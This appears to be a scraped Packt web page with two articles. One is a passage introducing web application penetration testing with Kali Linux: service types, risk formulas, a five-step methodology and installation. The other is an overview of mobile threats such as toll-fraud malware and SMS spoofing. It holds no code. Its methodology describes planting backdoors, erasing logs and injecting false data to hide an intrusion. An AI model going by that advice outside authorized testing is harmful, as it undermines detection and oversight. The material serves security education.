HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers if your audit services include any level of insurance or protection if an audit isn't successful after your services. It's also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on the standard types of reporting and following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines to raise the level of security to an acceptable level of protection for real-world threats. Services should include following up with customers to assist with remediation along with raising the bar for security beyond any industry standards and baselines. Vulnerability Assessment: This is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerability is a gap, error, or weakness in how a system is designed, used, and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges, denial-of-service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester doesn't execute an attack against the vulnerability to verify if it's genuine. A Vulnerability Assessment deliverable provides potential risk associated with all the vulnerabilities found with possible remediation steps. There are many solutions such as Kali Linux that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk. The downside of many security audits is vulnerability scan results that make security audits thicker without providing any real value. Many vulnerability scanners have false positives or identify vulnerabilities that are not really there. They do this because they incorrectly identify the OS or are looking for specific patches to fix vulnerabilities but not looking at rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that vulnerability reports by automated tools will need to be checked. Customers will want to know the risk associated with vulnerability and expected cost to reduce any risk found. To provide the value of cost, it's important to understand how to calculate risk. Calculating risk It is important to understand how to calculate risk associated with vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triangle of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually as well as the vulnerability in its entirety to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide if the risk associated to vulnerability found justifies or outweighs the cost of controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data. The Certified Information Systems Security Professional (CISSP) curriculum lists formulas for calculating risk as follow. A Single Loss Expectancy (SLE) is the cost of a single loss to an Asset Value (AV). Exposure Factor (EF) is the impact the loss of the asset will have to an organization such as loss of revenue due to an Internet-facing server shutting down. Customers should calculate the SLE of an asset when evaluating security investments to help identify the level of funding that should be assigned for controls. If a SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget. The Single Loss Expectancy formula: SLE = AV * EF The next important formula is identifying how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protection dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is lost is called the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of annual anticipated loss due to risk. For example, a meteor falling has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be calculated in future investments for protecting a building. Annualized Loss Expectancy formula: ALE = SLE * ARO The final and important question to answer is the risk associated with an asset used to figure out the investment for controls. This can determine if and how much the customer should invest into remediating vulnerability found in a asset. Risk formula: Risk = Asset Value * Threat * Vulnerability * Impact It is common for customers not to have values for variables in Risk Management formulas. These formulas serve as guidance systems, to help the customer better understand how they should invest in security. In my previous examples, using the formulas with estimated values for a meteor shower and fire in a building, should help explain with estimated dollar value why a fire prevention system is a better investment than metal dome protecting from falling objects. Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify if all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box depending on the scope of work agreed upon. The key difference between a Penetration Test and Vulnerability Assessment is that a Penetration Test will act upon vulnerabilities found and verify if they are real reducing the list of confirmed risk associated with a target. A Vulnerability Assessment of a target could change to a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in a target. Typically, Penetration Testing services have a higher cost associated since the services require more expensive resources, tools, and time to successfully complete assignments. One popular misconception is that a Penetration Testing service enhances IT security since services have a higher cost associated than other security services: Penetration Testing does not make IT networks more secure, since services evaluate existing security! A customer should not consider a Penetration Test if there is a belief the target is not completely secure. Penetration Testing can cause a negative impact to systems: It's critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by authorities. Authorization should include who is liable for any damages caused during a penetration exercise as well as who should be contacted to avoid future negative impacts once a system is damaged. Best practice is alerting the customers of all the potential risks associated with each method used to compromise a target prior to executing the attack to level set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope. It is easier to be much more methodical in your approach. As a common best practice, we receive confirmation, which is a worst case scenario, that a system can be restored by a customer using backups or some other disaster recovery method. Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common methods by which hackers obtain information about targets is through social engineering via attacking people rather than systems. Examples are interviewing for a position within the organization and walking out a week later with sensitive data offered without resistance. This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end-goal so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose. A Penetration Testing engagement's success for a service provider is based on profitability of time and services used to deliver the Penetration Testing engagement. A more efficient and accurate process means better results for less services used. The higher the quality of the deliverables, the closer the service can meet customer expectation, resulting in a better reputation and more future business. For these reasons, it's important to develop a methodology for executing Penetration Testing services as well as for how to report what is found. Kali Penetration Testing concepts Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless if the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools. Step 1 – Reconnaissance You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better chance you have to identify the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint, monitoring resources, people, and processes, scanning for network information such as IP addresses and systems types, social engineering public services such as help desk and other means. Reconnaissance is the first step of a Penetration Testing service engagement regardless if you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data will develop a plan of action regarding the easiest methods to obtain desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, what applications are associated with the assets, services used, and possible asset owners. Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Tools include methods to research network, data center, wireless, and host systems. The following is the list of Reconnaissance goals: Identify target(s) Define applications and business use Identify system types Identify available ports Identify running services Passively social engineer information Document findings Step 2 – Target evaluation Once a target is identified and researched from Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about a target to select how to analyze for possible vulnerabilities or weakness. Examples for testing for weakness in how the web application operates, identified services, communication ports, or other means. Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves accuracy of targeting possible vulnerabilities, shortens execution time to perform target evaluation services, and helps to avoid existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute and only generate generic details about the system and applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, provide a good possible vulnerability to exploit, and take seconds to execute. Evaluating targets for vulnerabilities could be manual or automated through tools. There is a range of tools offered in Kali Linux grouped as a category labeled Vulnerability Analysis. Tools range from assessing network devices to databases. The following is the list of Target Evaluation goals: Evaluation targets for weakness Identify and prioritize vulnerable systems Map vulnerable systems to asset owners Document findings Step 3 – Exploitation This step exploits vulnerabilities found to verify if the vulnerabilities are real and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation and all the following steps have legal ramifications without authorization from the asset owners of the target. The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy based on leading with the most vulnerable first. Exploiting targets can be manual or automated depending on the end objective. Some examples are running SQL Injections to gain admin access to a web application or social engineering a Helpdesk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools titled Exploitation Tools for exploiting targets that range from exploiting specific services to social engineering packages. The following is the list of Exploitation goals: Exploit vulnerabilities Obtain foothold Capture unauthorized data Aggressively social engineer Attack other systems or applications Document findings Step 4 – Privilege Escalation Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate privileges granted to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administration login credentials, obtaining an administrator password through password cracking, and accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help gain Privilege Escalation through the Password Attacks and Exploitation Tools catalog. Since most of these tools include methods to obtain initial access and Privilege Escalation, they are gathered and grouped according to their toolsets. The following is a list of Privilege Escalation goals: Obtain escalated level access to system(s) and network(s) Uncover other user account information Access other systems with escalated privileges Document findings Step 5 – maintaining a foothold The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. It is possible that penetration efforts will trigger defenses that will eventually secure how the Penetration Tester obtained access to the network. Best practice is establishing other means to access the target as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels. The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This will make it harder to detect the attack thus reducing the reaction by security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access focused on keeping a foothold within a target. Tools are used for establishing various forms of backdoors into a target. The following is a list of goals for maintaining a foothold: Establish multiple access methods to target network Remove evidence of authorized access Repair systems impacting by exploitation Inject false data if needed Hide communication methods through encryption and other means Document findings Introducing Kali Linux The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that to move forward with the challenges of cyber security and modern testing a new foundation was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem. Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new compliant filesystems translate into running most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/. Kali system setup Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images. If you plan on using Kali Linux on a virtual machine such as VMware, there is a VM image prebuilt. The advantage of downloading the VM image is that it comes preloaded with VMware tools. The VM image is a 32-bit image with Physical Address Extension support, or better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems that have argued for and against the usefulness of a PAE kernel. However, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment. Running Kali Linux from external media Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implementations. Kali Linux having to load programs from a remote source would impact performance and some applications or hardware settings may not operate properly. Using read-only storage media does not permit saving custom settings that may be required to make Kali Linux operate correctly. It's highly recommended to install Kali Linux on a host hard drive. Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are shown in the following list, although we suggest exceeding the minimum amount by at least three times. Kali Linux, in general, will perform better if it has access to more RAM and is installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install. The following is a list of minimum installation requirements: A minimum of 8 GB disk space for installing Kali Linux. For i386 and amd64 architectures, a minimum of 512MB RAM. CD-DVD Drive / USB boot support. You will also need an active Internet connection before installation. This is very important or you will not be able to configure and access repositories during installation. When you start Kali you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform. Select the local language preference, country, and keyboard preferences. Select a hostname for the Kali Linux host. The default hostname is Kali. Select a password. Simple passwords may not work so chose something that has some degree of complexity. The next prompt asks for your timezone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern standard time. The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change from initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process as shown in the following screenshot: Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for you network. Kali will prompt to install GRUB. GRUB is a multi-bootloader that gives the user the ability to pick and boot up to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system. Kali Linux and VM image first run On some Kali installation methods, you will be asked to set the root's password. When Kali Linux boots up, enter the root's username and the password you selected. If you downloaded a VM image of Kali, you will need the root password. The default username is root and password is toor. Kali toolset overview Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups as seen in the drop-down menu shown in the following screenshot: Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to protocols used. Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools. Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However web applications do not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section. Password Attacks: This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication. Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target. Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems having multiple hooks back to the attacker to provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated. Reverse Engineering: These tools are used to disable an executable and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to development of other programs. Reverse Engineering is also used for malware analysis to determine what an executable does or by researchers to attempt to find vulnerabilities in software applications. Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a denial of service attack). Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Ardunio tools that are used for programming and controlling other small electronic devices. Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications. Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise. System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. Summary This article served as an introduction to Penetration Testing Web Applications and an overview of setting up Kali Linux. We started off defining best practices for performing Penetration Testing services including defining risk and differences between various services. The key takeaway is to understand what makes a Penetration Test different from other security services, how to properly scope a level of service and best method to perform services. Positioning the right expectations upfront with a potential client will better qualify the opportunity and simplify developing an acceptable scope of work. This article continued with providing an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and brief overview of toolsets available. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services. Resources for Article: Further resources on this subject: BackTrack 4: Security with Penetration Testing Methodology [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] Making a Complete yet Small Linux Distribution [Article]
Read more
  • 0
  • 0
  • 3188

article-image-mobile-and-social-threats-you-should-know-about
Packt
17 Sep 2013
8 min read
Save for later

Mobile and Social - the Threats You Should Know About

Packt
17 Sep 2013
8 min read
(For more resources related to this topic, see here.) A prediction of the future (and the lottery numbers for next week) scams Security threats, such as malware, are starting to be manifested on mobile devices, as we are learning that mobile devices are not immune to virus, malware, and other attacks. As PCs are increasingly being replaced by the use of mobile devices, the incidence of new attacks against mobile devices is growing. The user has to take precautions to protect their mobile devices just as they would protect their PC. One major type of mobile cybercrime is the unsolicited text message that captures personal details. Another type of cybercrime involves an infected phone that sends out an SMS message that results in excess connectivity charges. Mobile threats are on the rise according to the Symantec Report of 2012; 31 percent of all mobile users have received an SMS from someone that they didn't know. An example is where the user receives an SMS message that includes a link or phone number. This technique is used to install malware onto your mobile device. Also, these techniques are an attempt to hoax you into disclosing personal or private data. In 2012, Symantec released a new cybercrime report. They concluded that countries like Russia, China, and South Africa have the highest cybercrime incidents. Their rate of exploitation ranges from 80 to 92 percent. You can find this report at http://now-static.norton.com/now/en/pu/images/Promotions/2012/cybercrimeReport/2012_Norton_Cybercrime_Report_Master_FINAL_050912.pdf. Malware The most common type of threat is known as malware . It is short for malicious software. Malware is used or created by attackers to disrupt many types of computer operations, collect sensitive information, or gain access to a private mobile device/computer. It includes worms, Trojan horses, computer viruses, spyware, keyloggers and root kits, and other malicious programs. As mobile malware is increasing at a rapid speed, the U.S. government wants users to be aware of all the dangers. So in October 2012, the FBI issued a warning about mobile malware (http://www.fbi.gov/sandiego/press-releases/2012/smartphone-users-should-be-aware-of-malware-targeting-mobile-devices-and-the-safety-measures-to-help-avoid-compromise). The IC3 has been made aware of various malware attacking Android operating systems for mobile devices. Some of the latest known versions of this type of malware are Loozfon and FinFisher. Loozfon hooks its victims by emailing the user with promising links such as: a profitable payday just for sending out email. It then plants itself onto the phone when the user clicks on this link. This specific malware will attach itself to the device and start to collect information from your device, including: Contact information E-mail address Phone numbers Phone number of the compromised device On the other hand, a spyware called FinFisher can take over various components of a smartphone. According to IC3, this malware infects the device through a text message and via a phony e-mail link. FinFisher attacks not only Android devices, but also devices running Blackberry, iOS, and Windows. Various security reports have shown that mobile malware is on the rise. Cyber criminals tend to target Android mobile devices. As a result, Android users are getting an increasing amount of destructive Trojans, mobile botnets, and SMS-sending malware and spyware. Some of these reports include: http://www.symantec.com/security_response/publications/threatreport.jsp http://pewinternet.org/Commentary/2012/February/Pew-Internet-Mobile.aspx https://www.lookout.com/resources/reports/mobile-threat-report As stated recently in a Pew survey, more than fifty percent of U.S. mobile users are overly suspicious/concerned about their personal information, and have either refused to install apps for this reason or have uninstalled apps. In other words, the IC3 says: Use the same precautions on your mobile devices as you would on your computer when using the Internet. Toll fraud Since the 1970s and 1980s, hackers have been using a process known as phreaking . This trick provides a tone that tells the phone that a control mechanism is being used to manage long-distance calls. Today, the hackers are now using a technique known as toll fraud . It's a malware that sends premium-rate SMSs from your device, incurring charges on your phone bill. Some toll fraud malware may trick you into agreeing to murky Terms of Service, while others can send premium text messages without any noticeable indicators. This is also known as premium-rate SMS malware or premium service abuser . The following figure shows how toll fraud works, portrayed by Lookout Mobile Security: According to VentureBeat, malware developers are after money. The money is in the toll fraud malware. Here is an example from http://venturebeat.com/2012/09/06/toll-fraud-lookout-mobile/: Remember commercials that say, "Text 666666 to get a new ringtone everyday!"? The normal process includes: Customer texts the number, alerting a collector—working for the ringtone provider—that he/she wants to order daily ringtones. Through the collector, the ringtone provider sends a confirmation text message to the customer (or sometimes two depending on that country's regulations) to the customer. That customer approves the charges and starts getting ringtones. The customer is billed through the wireless carrier. The wireless carrier receives payment and sends out the ringtone payment to the provider. Now, let's look at the steps when your device is infected with the malware known as FakeInst : The end user downloads a malware application that sends out an SMS message to that same ringtone provider. As normal, the ringtone provider sends the confirmation message. In this case, instead of reaching the smartphone owner, the malware blocks this message and sends a fake confirmation message before the user ever knows. The malware now places itself between the wireless carrier and the ringtone provider. Pretending to be the collector, the malware extracts the money that was paid through the user's bill. FakeInst is known to get around antivirus software by identifying itself as new or unique software. Overall, Android devices are known to be impacted more by malware than iOS. One big reason for this is that Android devices can download applications from almost any location on the Internet. Apple limits its users to downloading applications from the Apple App store. SMS spoofing The third most common type of scam is called SMS spoofing . SMS spoofing allows a person to change the original mobile phone number or the name (sender ID) where the text message comes from. It is a fairly new technology that uses SMS on mobile phones. Spoofing can be used in both lawful and unlawful ways. Impersonating a company, another person, or a product is an illegal use of spoofing. Some nations have banned it due to concerns about the potential for fraud and abuse, while others may allow it. An example of how SMS spoofing is implemented is as follows: SMS spoofing occurs when the message sender's address information has been manipulated. This is done many times to impersonate a cell phone user who is roaming on a foreign network and sending messages to a home area network. Often, these messages are addressed to users who are outside the home network, which is essentially being "hijacked" to send messages to other networks. The impacts of this activity include the following: The customer's network can receive termination charges caused by the valid delivery of these "bad" messages to interlink partners. Customers may criticize about being spammed, or their message content may be sensitive. Interlink partners can cancel the home network unless a correction of these errors is implemented. Once this is done, the phone service may be unable to send messages to these networks. There is a great risk that these messages will look like real messages, and real users can be billed for invalid roaming messages that they did not send. There is a flaw within iPhone that allows SMS spoofing. It is vulnerable to text messaging spoofing, even with the latest beta version, iOS 6. The problem with iPhone is that when the sender specifies a reply-to number this way, the recipient doesn't see the original phone number in the text message. That means there's no way to know whether a text message has been spoofed or not. This opens up the user to other spoofing types of manipulation where the recipient thinks he/she is receiving a message from a trusted source. According to pod2g (http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html): In a good implementation of this feature, the receiver would see the original phone number and the reply-to one. On iPhone, when you see the message, it seems to come from the reply-to number, and you loose track of the origin.
Read more
  • 0
  • 0
  • 1315